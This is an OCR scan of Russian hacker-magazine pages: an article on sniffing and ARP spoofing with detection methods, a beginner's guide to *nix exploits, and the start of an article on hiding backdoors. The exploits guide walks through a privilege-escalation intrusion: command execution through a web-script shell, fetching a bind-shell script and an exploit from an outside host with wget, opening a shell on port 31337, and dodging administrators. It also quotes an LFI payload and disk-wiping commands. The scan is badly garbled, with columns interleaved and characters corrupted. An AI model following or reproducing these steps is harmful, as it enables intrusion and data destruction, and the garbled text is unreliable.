(даже при модемном подключении!), 
спутниковый и мобильный интернет, 


логии общей шины, каждый испускае- 
мый пакет доставляется всем участни- 
кам сети. Сетевая карта на аппаратном 
уровне анализирует заголовки паке- 
тов (фреймов) и сверяет свой физи- 
ческий адрес (так же называемый 
MAC-agpecom) с адресом, прописанном 
в Ethernet-3aronoBke, передавая на IP- 
уровень только "свои" пакеты. 

Для перехвата трафика карту необ- 
ходимо перевести в неразборчивый 
(promiscuous) режим, в котором на [Р- 
уровень передается 


все принятые пакеты. 
Неразборчивый ре- 
жим поддерживает 
подавляющее боль- 
шинство стандартных 
карт, провоцируя из- 
лишне любопытных 
пользователей на 
проникновение в ин- 
тимную жизнь ос- 
тальных участников 
сети. 

Переход на витую 


пару с концентрато- 
ром ничего не меняет 
- отправляемые паке- 
ты дублируются на 
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= етевой трафик содержит уйму интересного - пароли, номера кредитных карт, конфиденциальную переписку, и все 
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= заниматься подобными вещами. Hy a неугомонным экспериментаторам лучше написать свой собственный снифер, и эта 
статья подскажет как. 
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ЦЕЛИ И МЕТОДЫ беспроводные средства связи (ИК, каждый выход хаба и грабятся по той 
АТАКИ «голубой зуб») и т.д. В основном мы же самой схеме. Коммутатор, самосто- 
и Снифером (от англ. будем говорить о локальных сетях, а ятельно анализирующий заголовки 
sniff - вынюхивать) на- — все остальные объекты рассмотрим пакетов и доставляющий их только 
зывают утилиты для лишь кратко, так как они требуют сов- — тем узлам, для которых они предназ- 
перехвата сетевого трасфика, agpeco- сем другого подхода. начены, предотвращает пассивный 
ванного другому узлу, или - в более По методу воздействия на жертву перехват, вынуждая атакующего пе- 
общем случае - всего доступного существующие атаки можно разде- реходить к активным действиям. 
трасрика, проходящего или не прохо- лить на два типа: пассивные и актив- Таким образом, для реализации пас- 
Te дящего через данный хост. Большин- ные. Пассивный снифинг позволяет сивного снифинга мы должны пере- 
ство снифе- ство сниферов представляют собой перехватывать лишь ту часть трафи- вести сетевую карту в неразборчи- 
НИЯ вполне легальные средства монито- ка, которая физически проходит че- вый режим и создать сырой (raw) со- 
Gantanonne ринга и He требуют установки допол- рез данный узел. Все остальное мо- кет, дающий доступ ко всему, что ва- 
легальные нительного оборудования. Тем не ме- жет быть получено лишь путем пря- лится на данный !Р-интерфейс. Обыч- 
они орин- нее, их использование в общем слу- мого вмешательства в сетевые про- ные сокеты для этой цели не подхо- 
га и не тре- чае незаконно или же предполагает цессы (модификация таблиц маршру- дят, поскольку принимают только яв- 
и соответствующие полномочия (напри- — тизации, отправка подложных паке- но адресованные им пакеты, поступа- 
полнитель- мер, монтер может подключаться к те- — тов ит.д.). ющие на заданный порт. Легальные 
ного обору- лефонным проводам, аты - нет). сниферы чаще всего используют 
ыы Кстати говоря, слово "sniffer" являет- ПАССИВНЫЙ кросс-платформенную библиотеку 
ся торговой маркой компании Network MEPEXBAT ТРАФИКА libpcap, однако настоящие хакеры 
Associates, распространяющей сете- и Локальная сеть уже давно стала предпочитают разрабатывать ядро 
вой анализатор "Sniffer(r) Network пониматься синонимично Ethernet, а в снисфера самостоятельно. 
тия Analyzer". Использовать этот термин Ethernet-ceTax, построенных по топо- Операционные системы *nix блоки- 


руют прямой доступ к оборудованию 
с прикладного уровня (так что переп- 
рограммировать сетевую карту просто 
так не удастся), однако все же предос- 
тавляют специальные рычаги для пе- 
ревода интерфейса в неразборчивый 
режим, правда, в различных никсах 
эти рычаги очень разные, что сущест- 
венно усложняет нашу задачу. 

В состав BSD входит специальный 
пакетный фильтр (ВРЕ - BSD Packet 
Filter), поддерживающий гибкую схе- 
му выборочного перехвата чужих па- 
кетов и соответствующий устройству 
/dev/bpf. Перевод интерфейса в не- 
разборчивый режим осуществляется 
посредством IOCTL и выглядит приб- 
лизительно так: 

ioctl(fd, BIOCPRO} 

где fd - дескриптор интерорейса, а 
BIOCPROMISC - управляющий IOCTL- 
код. В Solaris'e все осуществляется 
аналогично, не совпадает только 
1ЮСТЕ-код и устройство называется не 
bpf, a hme. Похожим образом ведет 
себя и SunOS, предоставляющая по- 
токовый драйвер псевдоустройства 
nit, также называемый краником в се- 
тевом интерфейсе (NIT - Network 
Interface Tap). В отличие от пакетного 


U), 


фильтра BPF, потоковый фильтр NIC 
перехватывает только входящие па- 
кеты, позволяя исходящим прошмыг- 
нуть мимо него. К тому же он намного 
медленнее работает. Иную схему гра- 
бежа траффика реализует OC Linux, 
поддерживающая специальные 
ЮСТЕ-коды для взаимодействия с 
сетью на уровне драйверов. Просто 
создай сырой сокет вызовом Socket 
(PF_PACKET, SOCK_RAW, int proto- 
col) и переведи связанный с ним ин- 
терфейс в неразборчивый режим: 

ifr.ifr_flags |= IFF_PROMISC; ioctl ($, 
SIOCGIFFLAGS, ifr), 

где $ - дескриптор сокета, a ifr - ин- 
терфейс. 

Полностью готовую к употреблению 
функцию, подготавливающую сырой 
сокет к работе с переводом интер- 
фейса в неразборчивый режим и под- 
держивающую большое количество 
различных операционных систем, как 
To: SunOS, Linux, FreeBSD, IRIX и 
Solaris, можно легко выдрать из сни- 
сфера, исходный текст которого нахо- 
дится по адресу: П//раскеогизесий- 
{у.ого/зпег$/94413.с. 


ОБНАРУЖЕНИЕ 
ПАССИВНОГО ПЕРЕХВАТА 

и Перевод интерфейса в неразбор- 
чивый режим не проходит бесследно 


и легко обнаруживается утилитой 
ifconfig, отображающей его статус, 
правада, для этого администратор дол- 
жен иметь возможность удаленного 
запуска программ на машине атакую- 
щего, чему атакующий может легко 
воспрепятствовать или модифициро- 
вать код ifconfig (и других аналогич- 
ных ей утилит) так, чтобы она выдава- 
ла подложные данные. Кстати говоря, 
засылая сниффер на какой-либо 
компьютер, всегда нужно помнить, 
что его присутствие в подавляющем 
большинстве случаев обнаруживает- 
ся именно по ifconfig! 

Многие легальные сниферы автома- 
тически резолвят все полученные |P- 
адреса, выдавая атакующего с голо- 
вой. Администратор посылает пакет 
на несуществующий МАС-адрес от/на 
несуществующего IP. Узел, поинтере- 
совавшийся доменным именем данно- 
го IP, и будет узлом атакующего. Есте- 
ственно, если атакующий использует 
собственный сниффер, вырубит DNS в 
настройках сетевого соединения или 
оградит себя локальным брандмауэ- 
ром, администратор останется Haegu- 
не со своей задницей. 

Как вариант, администратор может 
послать на несуществующий МАС-ад- 
рес пакет, предназначенный для атаку- 
ющего (с действительным IP-agpecom и 


Многие легальные сниферы автоматически 
резолвят все полученные |P-agpeca, 
выдавая атакующего с головой. 


ХАБЫ И УХАБЫ 


Ш Хабом (от англ. hub - ступица колеса), или концентратором, Ha- 
зывают многопортовый репитер (повторитель). Получив данные на 
один из портов, репитер немедленно перенаправляет их на осталь- 


ные порты. В коакси- 
альных сетях репитер 
не является обяза- 
тельным KOMMOHEH- 
том, и при подключе- 
нии методом общей 
шины можно обой- 
тись без него. 


В сетях на витой паре и коаксиальных 


сетях, 


построенных NO топологии 


«звезда», репитер присутствует изна- 


чально. 


Свитч (от англ. switch - коммутатор), 
также называемый интеллектуальным 
хабом/маршрутизатором, представля- 
ет собой разновидность репитера, пе- 
редающего данные только на порт то- 
го узла, которому они адресованы, что предотвращает возмож- 
ность перехвата трафика (во всяком случае, теоретически). 


Топология «звезда» 


портом отвечающей службы, напри- 
мер, (СМР ECHO, более известной как 
ping). Работая в неразборчивом режи- 
ме, сетевая карта передаст такой пакет 
на |Р-уровень, и тот будет благополуч- 
но обработан системой, автоматически 
генерирующей эхо-ответ. Чтобы не уго- 
дить в ловушку, атакующий должен 
отключить ICMP и закрыть все TCP- 
порты, что можно сделать с помощью 
того же брандмауэра, конечно, при ус- 
ловии, что тот не открывает никаких 
дополнительных портов (а большин- 
ство брандмауэров их открывают). 

Между прочим, грабеж трасфика тре- 
бует ощутимых процессорных ресур- 
сов, и машина начинает заметно тор- 
мозить. Ну, тормозит, и фиг с ней - 
какие проблемы? А вот какие. Адми- 
нистратор делает узлу атакующего 
ping и засекает среднее время откли- 
ка. Затем направляет шторм пакетов 
на несуществующие (или существую- 
щие) МАС-адреса, после чего повто- 
ряет ping. Изменение времени откли- 
ка полностью демаскирует сракт пе- 
рехвата, и, чтобы этому противосто- 
ять, атакующий должен либо запре- 
тить ICMP: ЕСНО (что вызовет серьез- 
ные подозрения), либо стабилизиро- 
вать время отклика, вставляя то или 
иное количество холостых задержек 
(для этого ему придется модифициро- 
вать код эхо-демона). 

Разумеется, существуют и другие 
способы обнаружения пассивного пе- 
рехвата трафика. Например, админи- 
стратор пускает по сети подложный 
пароль, якобы принадлежащий root'y, 
а сам залегает в засаду и ждет, что за 
зверь в эту ловушку попадется, после 
чего направляет по соответствующе- 
му адресу бригаду каратистов быстро- 
го реагирования. 


АКТИВНЫЙ ПЕРЕХВАТ, 
ИЛИ АВР-СПУФИНГ 

и Отправляя пакет на заданный |P-ag- 
рес, мы, очевидно, должны доставить 
его какому-то узлу. Но какому? Ведь се- 
тевая карта оперирует исключительно 
физическими МАС-адресами, а про IP 
ничего не знает! Следовательно, нам не- 
обходима таблица соответствия МАС- и 
1Р-адресов. Построением такой таблицы 
занимается операционная система, и ge- 
лает это она при помощи протокола 
ARP (Address Resolution Protocol - про- 
токол разрешения адресов). Если сизи- 
ческий адрес получателя неизвестен, в 
сеть отправляется широковещательный 
запрос типа: "Обладатель данного IP, со- 
общите свой МАС". Получив ответ, узел 
заносит его в локальную АВР-таблицу, 
для надежности периодически обнов- 
ляя ее (срактически АБР-таблица предс- 
тавляет собой обыкновенный кэш). В 
зависимости от типа операционной сис- 
темы и ее консригурации интервал об- 
новления может варьироваться в диа- 
пазоне от ЗО сек. go 20 мин. 

Никакой авторизации для обновле- 
ния АБР-таблицы не требуется, более 


того, большинство операционных сис- у 
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7 взлом 


РЫБНАЯ ЛОВЛЯ В ЛОКАЛЬНОЙ СЕТИ) 


тем благополучно переваривают АКР- 
ответы, даже если им не предшество- 
вали соответствующие АБР-запросы 
(SunOS - одна из немногих, кто не 
позволяет обмануть себя подобным 
образом, и потому подложный ARP- 
пакет должен быть отправлен только 
после соответствующего АБР-запро- 
са, но gO прихода подлинного ответа). 
Для захвата чужого IP атакующему 
достаточно послать подложный ARP- 
запрос, который может быть как целе- 
направленным, так и широковеща- 
тельным (для отправки/приема ARP- 
пакетов необходим доступ к сырым со- 
кетам или специальному API операци- 
онной системы, подробности можно 
расковывать в утилите агр). Допустим, 
атакующий хочет перехватить трафик 
между узлами "А" и "В". Он посылает 
узлу "А" подложный АБР-ответ, содер- 
жащий IP-agpec узла "В" и свой МАС- 
адрес, а узлу "В" - АВР-ответ с |P-ag- 


ны pages ресом узла "А" и своим МАС-адресом. 
ка карту Оба узла обновляют свои АКР-табли- 
необходимо цы и все отправляемые ими пакеты 
перевести в 
неразборчи= попадают на узел злоумышленника, 
вый режим, который либо блокирует, либо достав- 
ы а ро ляет их получателю (возможно, в слег- 
вень пере- ка измененном виде, то есть работает 
нате как прокси). Если послать подложный 
пакеты, ARP-nakeT маршрутизатору, атакую- 
щий сможет перехватывать и пакеты, 
приходящие извне данного сегмента 
сети. Атака такого типа называется 
ММ (сокращение от «Man-In-the- 
Перевод ин- Middle» - человек посередине). 
ря в Как вариант, можно послать под- 
неразборчи- ~ я Е 
вый режим ложный ARP-OTBeT с несуществую 


не проходит 


щим МАС-адресом. Тогда связь между 
бесследно и 


"А"и "В" будет утеряна, впрочем, че- 


легко обна- 

руживается рез некоторое время она автомати- 
утилитой чески восстановится (ведь АВР-таб- 
ifconfig. 


лица динамически обновляется!) и, 
чтобы этого не произошло, атакую- 


anum | + 


_ 


Атака типа ММ позволяет перехватывать трафик даже в 
сетях с коммутатором 


Разрыв соединения между узлами 


ХАКЕРСПЕЦ 
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ПЕРЕХВАТ ТРАФИКА HA DIAL-UP 


щий должен направить на жертву 
мощный поток подложных пакетов. 
Кстати, если маршрутизатор не успе- 
вает маршрутизировать поступающие 
пакеты, он автоматически переключает- 
ся в широковещательный режим, стано- 
вясь обычным хабом. Загрузив маршру- 
тизатор работой по самые помидоры 
(или дождавшись пиковой загрузки се- 
ти), атакующий может преспокойно сни- 
орать традрик и в пассивном режиме. 


ОБНАРУЖЕНИЕ 

АКТИВНОГО ПЕРЕХВАТА 
Активная природа АБР-атаки де- 

маскирует злоумышленника, и сете- 

вые анализаторы типа arpwatch легко 


обнаруживают перехват. Они смотрят 
все пролетающие по сети пакеты (то 
есть работают как сниффер), вытаски- 
вают АКР-ответы и складывают их в 
базу данных, запоминая, какому МАС- 
адресу принадлежит какой |Р-адрес. 
При обнаружении несоответствия ад- 
министратору отправляется e-mail, к 
моменту получения которого наруши- 
тель обычно успевает скрыться со 
всем награбленным трафиком. К тому, 
же в сетях с DHCP (сервером динами- 
ческой раздачи !Р-адресов) arpwatch 
выдает большое количество ложных 
срабатываний, так как одному и тому 
же МАС-адресу назначаются различ- 
ные [Р-адреса. 


$ТЕАЁТН-СНИФИНГ 


Легкий взмах ножницами превращает обыч- 
ную карту в Stealth 


МНЕНИЕ ЭКСПЕРТА 


ПОЛЕЗНЫЕ ССЫЛКИ 


Некоторые операционные системы 
самостоятельно обнаруживают сфакт 
захвата своего |Р-адреса посторон- 
ним узлом, но только в том случае, 
если злоумышленник использовал 
широковещательную рассылку 
(очень зря). К тому же, по малопонят- 
ным для меня мотивам OC не отправ- 
ляет ARP-oTBeT, отбирая похищенный 
|Р-адрес назад, а просто отделывает- 
ся многоэтажным предупреждением, 


смысл которого до рядового пользо- 
вателя все равно не дойдет. 
Статическая АРР-таблица, фор- 
мируемая вручную, в этом плане 
выглядит намного более привле- 
кательной, правда, даже после пе- 
рехода на нее многие операцион- 
ные системы продолжают прини- 
мать подложные АВР-ответы, без- 
ропотно отдавая себя в лапы зло- 
умышленника, и убедить их не де- 


лать этого очень трудно, особенно 
если ты не гуру. 


КЛОНИРОВАНИЕ КАРТЫ 
Физический адрес сетевой карты 

обычно жестко прошит в ПЗУ, и по 
стандарту никакой МАС не может ис- 
пользоваться дважды. Тем не менее, 
всякое ПЗУ можно перепрограммиро- 
вать (особенно, если это перепрограм- 
мируемое ПЗУ типа EEPROM, каким на 
новых картах оно обычно и бывает). 
Также некоторые карты позволяют из- 
менять свой МАС вполне легальными 
средствами (например, все той же мно- 
гострадальной ifconfig). Наконец, заго- 
ловок Ethernet-naketa сформируется 
программными, а не аппаратными Cpeg- 
ствами, поэтому нечестный драйвер 
может запросто прописать чужой МАС! 

Клонирование МАС-адреса позволя- 
ет перехватывать трафик даже без 
присвоения чужого IP и без перевода 
карты в неразборчивый режим. 


ОБНАРУЖЕНИЯ КЛОНИРОВА- 
НИЯ И ПРОТИВОСТОЯНИЕ ЕМУ 
Факт клонирования (которым, кста- 

ти, любят баловаться пользователи по- 
пулярных ныне домашних сетей) легко 
обнаружить с помощью протокола 
RARP (Reverse ARP), позволяющего 
определить, какой IP-agpec соответ- 
ствует данному МАС. Каждому МАС 
должен соответствовать только один 
|Р-адрес, в противном случае здесь 
что-то не так. Естественно, если атаку- 
ющий не только клонирует МАС, но и 
захватит IP, этот прием не сработает. 

Качественные маршрутизаторы поз- 
воляют байнодить (от англ. bind - свя- 
зывание) порты, закрепляя за каж- 
дым "проводом" строго определенный 
МАС, обессмысливая тем самым его 
клонирование. 


ЗАКЛЮЧЕНИЕ 

Разработка собственного снисера 
- это хороший способ поупражняться в 
программировании, покопаться в нед- 
рах операционной системы и изучить 
большое количество сетевых протоко- 
лов. Короче говоря, совместить прият- 
ное с полезным. Можно, конечно, ис- 
пользовать и готовые утилиты, но это 
все равно, что стрелять в кабана, при- 
вязанного к дереву - ни азарта, ни 
удовлетворения. = 


Никакой ав- 
торизации 
для обнов- 
ления АВР- 
таблицы не 
требуется! 


Некоторые 
операцион- 
ные систе- 
мы самос- 
тоятельно 
обнаружи- 
вают факт 
захвата 
своего IP- 
адреса пос- 
торонним 
узлом. 


*NIX 
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или, говоря простым языком, глючит и 
зависает. Если ты не знаешь, что зна- 
чит выпадать в соге, приведу анало- 
гичный пример из Винды, с которым 
ты уж точно не раз сталкивался: прог- 
рамма зависает и выдает окошко 
"programm.exe - Ошибка приложе- 
ния" примерно такого содержания: 
"Инструкция по адресу Ox12121212 об- 
ратилась к памяти по адресу 
0х13131313. Память не может быть 
'геад"". Отличие лишь в том, что *nix- 
системы пишут на диск своеобразный 
дамп памяти, по которому можно оп- 
ределить причину ошибки. 


ОТЧЕГО ЖЕ ПРОИСХОДИТ 
ПЕРЕПОЛНЕНИЕ? 

m Существует множество различных 
типов переполнения бусфера, соответ- 
ственно, и причин столько же. Чтобы 
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Также в этом есть часть вины самой 
архитектуры х86. В ближайшем вре- 
мени компания Intel планирует выпус- 
тить процессор с аппаратной защи- 
той от уязвимостей переполнения бу- 
сфера. Насколько она будет эфорек- 
тивна, мы сможем убедиться в бли- 
жайшем будущем, а пока эксплоиты, 
использующие эти уязвимости, жи- 
вут и процветают. 


ЭКСПЛОИТЫ - КАКИЕ ОНИ? 

и Эксплоиты разделяют Ha удален- 
ные (remote) и локальные (local). За- 
меть: "удаленные" (remote) никаким 
местом не связаны с "удаленными" 
(erased, removed, deleted). Удаленные 
сплоиты позволяют использовать баг 
в сервисе, доступном извне, к которо- 
му можно подсоединиться с другой 
машины посредством локальной сети 


>< 
2 . > 
* 
Ss > 
Е ® ® 
= 
c 
> 
= 
о 
= ЭКСПЛОИТЫ ПОД *NIX ДЛЯ НАЧИНАЮЩИХ 
|= 
ш чень часто требуется добыть важную информацию, упрятанную на вражеском сервере. В большинстве случаев эта 
= о информация рядовому пользователю системы недоступна, поэтому встает вопрос о повышении прав в системе, 
разрешается который при помощи специальных программ - эксплоитов. 
ь. 
ЭТО ЧТО 3A наглядно показать тебе, каким обра- или интернета. К таким сервисам от- 
ПОКЕМОН? зом получаются переполнения, я при- носится, например, telnetd, ftpd, sshd, 
и Эксплоиты - специ- веду пример. pop3d. Чаще всего черви, написанные 
альные программы, ис- gna OC *nix, распространяются имен- 
пользующие уязвимос- #include <stdio.h но таким способом. То есть они содер- 
ти в том или ином компоненте систе- nt main() жат встроенный эксплоит для внеш- 
мы или сервисе с целью повышения { него сервиса. Если возвратиться к 
или получения прав в системе либо char b ] = {0}; //как ты видишь, в Windows, то самым ярким аналогом 
для деструктивных целей, например, самом начале все элементы. является уязвимость в RPC DCOM 
сли изнаа DOS-atak. Для поиска уязвимостей }еленного под переменную буфера операционных систем Windows 
чально нет чаще всего берутся сервисы или ком- вляют 10 нулей. 2000/NT/XP/2003 и червь msblast. 
и поненты системы, запущенные с вы- // видно, что их может быть максимум Кстати, сообщения о том, что "компь- 
хостингу, сокими привилегиями, или приложе- 10! Т.е. т ммист рассчиты то ютер будет перезагружен через хх се- 
можно ния, принадлежащие руту, у которых // мы введем обязательно десятизнач- куно", - результат кривого переполне- 
тим = Установлен бит SUID/SGID. Практичес- ное число. ния буфера, вызванного непродуман- 
аккаунт на ки все программные эксплоиты ис- printf("Enter your 10-digit number"); // ным алгоритмом действий червячка. 
и пользуют уязвимости класса buffer Вводим число Эти эксплоиты зачастую более желан- 
совсем нет, overflow. Как ты, наверное, уже gora- anf(buf // A BOT мы и добра- ные для хакера, потому что для их ис- 
НЫ дался, взломщик, а, точнее, shell-Kog ЛИСЬ go функция зсап! в данном пользования чаще всего не требуется 
закардить (набор машинных инструкций, кото- // случае не проверяет длину денно- иметь никакого доступа к атакуемой 
или побру- рый заполняет собой переполненный го нами числа. Подумай, куда денется машине. Совершенно другая ситуация 
мать 2): буфер), встроенный в эксплоит, полу- йт информации, если мы с локальными эксплоитами: они поз- 
чит права дырявого приложения и введем не 10, а 20 знаков? воляют использовать брешь в прило- 
предоставит их атакующему, напри- // Правильно, выйдет за пределы буфе- жении или в компоненте операцион- 
мер, в виде открытого на каком-либо ра ной системы, не имеющем прямого 
порту shell’a с повышенными правами. } доступа к интернету. Ярким примером 
ны Немного по-другому обстоят дела с этого могут служить ядерные баги - 
нет ни од- Бо$-эксплоитами, shell-Kog которых Вот как все легко, а если после 10-го ptrace и do(brk). 
ного неуяз- представляет из себя своего рода символа вставить Shell-kog? Более Ты знаешь об уязвимостях в web- 
в "кракозябру", не имеющую никакого подробно обо всем этом читай в Спе- скриптах, которые можно использо- 
вопрос зак- лексического значения, и поэтому це #08.04(45). Уязвимости в прог- вать прямо из адресной строки брау- 
АРКАН приложение, пытаясь понять, что же рамме возникают из-за невниматель-  зера, например 
умении. это такое, сваливается в кору (соге), ности и халатности программистов. "http://www.vulnhost.hu/vulnscript.php 


?page-=../../../../etc/passwd"? Tak вот, 
после того как ты все это набрал, как 
думаешь, чем это стало? Эксплоитом! 
То есть исходя из определения 
эксплоитом для скрипта 
"vulnscript.nxn" является 
"?page=../../../../etc/passwd". 

Помимо такого деления эксплоиты 
можно разбить и на классы по их 
действиям. 


CLASS’HbIE ЭКСПЛОИТЫ 

и Некорректно говорить, что экспло- 
иты приводят к тому-то и тому-то. На 
самом деле, они просто переполняют 
буфер, а какие-либо действия выпол- 
няет shell-kog. Именно от содержания 
shell-koga зависит то, что произойдет 
при успешном выполнении атаки: отк- 
роется порт, выполнится команда или 
сервер уйдет в даун. 


Откровенно говоря, классов 


эксплоитов много. Я познакомлю те- 
бя с двумя. 


DOS SHELLCODE XPLOITS 
m Чаще всего, эти эксплоиты уда- 
ленного действия. Целью, которую 
преследует хакер, натравливая такую 
штуку на уязвимый сервер, является 
выведение из строя атакуемого сер- 
виса или всей операционной системы 
(да-да, бывают такие случаи, когда по- 
вешенный демон забирает с собой 
всю ОС). С каждым днем происходит 
все больше таких атак. Почему? Пото- 
му что тем, кто заказывает эти атаки, 
не нужна информация с сервера. 
Цель таких атак, как правило, баналь- 
ное лишение конкурента дееспособ- 
ности. Согласись, атаковать уязвимый 
сервис, подверженный DOS-atake, 
проще, чем натравливать целую ар- 
мию компьютеров на произведение 
ICMP- и подобных ей атак, действую- 
щих не проработанным принципом, а 
количеством. Второй причиной явля- 
ется то, что иногда, для того чтобы на- 
солить врагу, достаточно ООЗ-атаки, а 
не rm -rf / (мне больше нравится cat 
/dev/urandom > /dev/hda - прим. Ава- 
ланча), а уязвимостей, позволяющих 
произвести убойную атаку, гораздо 
больше, чем тех, которые позволяют 
получить доступ. Это происходит по- 
тому, что часто переполнить буфер 
бывает достаточно легко, а впарить 
shell-kog так, чтобы он выполнился 


как задумано, очень сложно, а порой 
даже нереально, так как в дырявой 

программе все-таки существует какая- 
то вредная проверка на вшивость. 


REMOTE SHELL 
SHELLCODE XPLOITS 
и Об этом классе эксплоитов я тоже 
уже успел упомянуть. После успеш- 
ной атаки на уязвимую машину они 
открывают на ней порт, к которому 
можно подконнектиться и получить 
долгожданный shell с рутовыми пра- 
вами. При этом в большинстве случа- 
ев тебе не придется пользоваться 
всеми удобствами /bin/bash: ты бу- 
дешь юзать стандартный /bin/sh, так 
как именно его чаще всего вызывают 
shell-KOgbI и именно он есть практи- 
чески на всех машинах с *гих-система- 
ми на борту. Но не думай, что через 
этот порт всегда можно ходить в сис- 
тему. Он легко убивается администра- 
тором, смывается ребутом или просто 
сам по себе отпадает после того, как 
от него отключишься. 


КТО БЫЛ НИКЕМ, 
ТОТ СТАНЕТ ВСЕМ 

и Для исполнения локального 
эксплоита требуется хотя бы shell с 
правами nobody. A как его можно 
получить? Вот об этом я сейчас и 
расскажу. 

Для начала понадобится доступ к 
одному из сайтов, которые хостятся 
на сервере. Это может быть ЕТР или 


fevil@net evil]$ 
[vertex’/lids/org] 


[*] 
[*] 
[*] 
[*] 
[*] 
[*] 
[+] 


attacking 23 
opening socket 
connected! 

Begin negotiate... 
Login... 

sending username 

sending password 


login: xie 
Password: 
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.“pan_smb —h 
Linux lib pam_smb ‹ 1.1.6 /“bin/login remote exploit 


asas яэфяз' яыязяз! яю"яыяъ яряъ#яряъ' яряъярязэяы 
Red Hat Linux release 6.1 (Cartman) 
Kernel 2.2.19-6.2.15 on an 1686 


| м 
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Будь пре- 
дельно ос- 
торожен, 
проверь ко- 
мандой fin- 
дег и м, нет 
ли в систе- 
ме актив- 
ных адми- 
нистрато- 
ров. 


Скрипты, 
написанные 
на Perl, 
следует за- 
ливать в 
текстовом 
режиме и 
устанавли- 
вать на них 
chmod 755 
или 777. 
Для того 
чтобы 
эксплоит вы- 
полнился, его 
тоже необхо- 
димо npoch- 
mod'uTb как 
+x (chmod 
xploit +x). 


34 взлом 


дырявый меБ-скрипт, позволяющий 
выполнять команды (с помощью не- 
го мы не сможем полноценно запус- 
тить эксплоит, но сможем залить 
кое-что). Если ЕТР есть, а команды 
мы выполнять не можем, надо испра- 
вить эту оплошность, залив на сер- 
вер (сервер должен поддерживать 
РНР) такой скрипт: 


Такая вот «малютка» умеет выпол- 
нять команды через запрос: www.tar- 
get.com/cmd.php?cmd=komanga. 

Теперь нам потребуется realtime- 
доступ к /bin/sh, который нам предос- 
тавит нижерасположенный скрипт: 


После выполнения он откроет порт с 
shell'om nobody, а пока сохраним его 
как bind.txt и зальем куда-нибудь на 
narod.ru. В случае с пагод.ги нет необ- 
ходимости называть его *.txt, можно 
сразу определить его как bind.pl, так 
как на Народе нет поддержки perl и 
скрипт сольется таким, каким он дол- 
жен быть. А если на сервере есть Nog- 
держка perl, он загрузится в виде 
html-cTpaHuubl, с результатами его вы- 
полнения. Но .txt они в Африке .txt. 
Поэтому лучше назовем его так :). 
Эксплоит заливаем туда же. 

Теперь, когда все готово, заливаем 
bind.txt и exploit.c через cmd.php ко- 
мандой wget или fetch gna Linux или 
FreeBSD соответственно. Можно 3a- 
лить и с помощью сценария FTP (уж 
ftp есть везде). Заливать bind.txt и 
эксплоит желательно в /tmp. Теперь 
нам понадобится запустить bind.txt, 
для чего выполним через cmd.php Ta- 
кую команду: www.target.com/ 
cmd.php?perl%20/tmp/bind.txt. Этим 
мы запустим скрипт bind.txt, который 
откроет для прослушивания порт 
31337, где будет висеть Shell с права- 
ми породу. Теперь не помешало бы 
скомпилить сплоит. Делается обычно 
это так: gcc /tmp/exploit.c -о 
/tmp/exploit. Теперь телнетимся на 
31337 порт target.com. В данном слу- 
чае, если нет желания ставить ";" пос- 
ле каждой команды и видеть все бо- 
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лее приглядно, можно использовать 
netcat (http://nsd.ru/soft/nctint.zip). 
Синтаксис таков: пс.ехе target.com 
31337. Теперь выполняем эксплоит... 
После каждой команды не забываем 
ввести «;» (если ты поленился юзать 
netcat и юзаешь обыкновенный tel- 
net). Например, чтобы выполнить ко- 
манду Is /tmp, надо ввести «Is /tmp;». 


O-DAY, PRIVATE 
И FAKE XPLOITS 

Private Xploits - личные эксплои- 
ты. О них никто ничего не знает, 


кроме автора и узкого круга его 
друзей. Иногда случаются утечки, и 
личное превращается в общее, на- 
зывающееся O-day, O-day xploits - 
это новинки. Приватные и O-day 
эксплоиты очень ценятся, потому 


что создатели программного обес- 
печения еще не подозревают об 
ошибке и в сети находятся сотни, 
тысячи, миллионы машин с этой 
уязвимостью, о которой почти никто 
не знает. Одним словом, это вели- 
чайший рулез. Прикинь, какой мож- 
но создать ботнет, если уязвимость 
распространенная, а хакеров, кото- 
рые о ней знают, всего несколько? 

Отдельно стоит поговорить о 
{аКе-эксплоитах, которые все чаще 
и чаще встречаются. Фэйки - это, 
по сути, обман, который иногда бы- 
вает безвредным, а в некоторых 
случаях содержит в себе выгоду 
для создателя, например, добавля- 
ет еще одного зомби в его ботнет, 
а на экран использующего ее заке- 
ра выдает сообщение о том, что 


ГДЕ ЖЕ БРАТЬ ЭКСПЛОИТЫ 


ССЫЛКИ 


система не подвержена атаке, или 
просто Segmentation Fault. Core 
dumped ;). Существуют целые rpyn- 
пы, которые промышляют Npoga- 
жей якобы KO-day», за которыми на 
самом деле скрываются фейки. Их 
нужно опасаться и перед исполь- 
зованием эксплоита внимательно 
изучить исходник. Если он содер- 
жит шестнадцатеричные вставки, 


a 
o— Е — — =F > 
=жЕ-— == 


ee ee Se 


| Типичный {аке-эксплоит 


Эксплоитное "дерево" 


нужно расшифровать их, ибо за 
ними может скрываться троян. 


ПОИСК УЯЗВИМОСТЕЙ 

Отдельно хотелось бы погово- 
рить о поиске уязвимостей. Порой 
очень трудно определить, какой 
софт стоит на удаленной системе, 
особенно когда не имеешь к ней да- 
же малейшего доступа. На помощь 
приходят различные сканеры, нап- 
ример, Retina, Shadow Security 
Scanner, XSpider. Сканирование ими 
даст исчерпывающую информацию 
об удаленной системе. 


ЗАКЛЮЧЕНИЕ 

Вот, наверное, и все, что я хотел 
рассказать об эксплоитах. Этой инорор- 
мация достаточно для большого начи- 
нания. Желаю удачи, и пусть твои боль- 
шие знания послужат благим целям. 
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рассказывают о проделанной за месяц работе 
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НЕВИДИМОСТЬ 


ОБЗОР STEALTH-MEXAHUSMOB БЭКДОРОВ 


осле взлома системы чрезвычайно сложно оставить там незаметный черный ход. Опытные администраторы очень 
быстро обнаруживают все известные и неизвестные бэкдоры. О том, как перехитрить админа и скрыть 
присутствие лазейки в системе, и пойдет речь в этой статье. 


авай подумаем, чем 


простейший бэкдор мо- 


жет выдать свое прису- 


Бэкдор - 
черный ход 
в систему. 


Массу по- 
лезной ин- 
формации и 
программ 
ты можешь 
найти на 
www.packet- 
stormsecuri- 
ty.nl. 


тствие. 

Во-первых, он суще- 
ствует как срайл. Администратор спо- 
собен обнаружить его с помощью 
элементарной утилиты IS и просто- 
напросто стереть, что нас ни в коей 
мере не устраивает. 

Во-вторых, если бэкдор запущен и 
работает, то он присутствует в систе- 
ме как процесс. Соответственно, мо- 
жет быть обнаружен админом с по- 
мощью утилиты pS, вываливающей в 
консоль список процессов. 

В-третьих, черный ход "висит" на ка- 
ком-то порту и ждет входящего соеди- 
нения для того, чтобы открыть кома- 
наный шелл взломщику, из-за чего 
может быть обнаружен массой раз- 
личных способов, самым простым из 
которых является анализ результата 
работы утилиты netstat. 

Кажется, что проще бэкдор удалить 
